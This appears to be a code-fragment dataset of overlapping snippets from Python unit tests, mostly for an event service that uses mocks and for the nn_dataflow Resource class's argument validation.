"the original aspect ratio \"\"\" term_width = get_term_width() # divide by 2 because",
"this function depends upon shutil.get_terminal_size this works only on Python >= 3.3 \"\"\""
] |
[] |
[
"self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\")",
"= self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response,",
"import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self,",
"self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response =",
"1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response,",
"self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event)",
"response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId()",
"self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"):",
"data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create()",
"patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService):",
"class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService =",
"def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect",
"Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response =",
"= self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else: return",
"import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class",
"def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value =",
"def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id):",
"import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\":",
"= self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response",
"= Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response",
"self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect",
"self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\")",
"test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if",
"from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService')",
"self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event]",
"response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else:",
"self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else: return None",
"EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService",
"Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event",
"TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase):",
"self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event)",
"def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response",
"self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self):",
"test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect =",
"self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def",
"Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self,",
"@patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value",
"= self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return",
"= MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def",
"self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event)",
"response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId()",
"Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self):",
"rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\",",
"from unittest import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event,",
"EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService()",
"MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self):",
"MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def",
"setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event",
"self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def",
"from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event =",
"= self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect =",
"Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1})",
"= self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response,",
"unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def",
"unittest import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService",
"test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response ="
] |
[
"test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2,",
"with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"= NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource",
".*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ =",
"array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details.",
"0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region",
"dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with",
"class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array.",
"self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width')",
"''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with",
"NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid",
"size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError,",
"the terms of the Modified BSD-3 License as published by the Open Source",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _",
"''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2,",
"src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region,",
"no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _",
"implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'):",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2),",
"from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self):",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with",
"'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"The Board of Trustees of Stanford University This program is free software: you",
"array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from",
"'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width.",
"'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8,",
"the Modified BSD-3 License as published by the Open Source Initiative. This program",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128,",
"test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,),",
"but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS",
"128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): '''",
"along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core",
"that it will be useful, but WITHOUT ANY WARRANTY; without even the implied",
"Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with",
"self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0),",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ =",
"= NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM)",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError,",
"def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2,",
"def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self):",
") def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ =",
"no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError,",
"test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License",
"NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region",
"Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"more details. You should have received a copy of the Modified BSD-3 License",
"size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with",
"def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region,",
"'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import",
"size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"(2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf')",
"'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid",
"''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ =",
"1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region,",
"type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError,",
"def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
") def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource:",
") def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ =",
"array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): '''",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16),",
"dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with",
"= NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM)",
"copy of the Modified BSD-3 License along with this program. If not, see",
"16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. '''",
"_ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"under the terms of the Modified BSD-3 License as published by the Open",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,),",
"size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with",
"Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): '''",
"size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
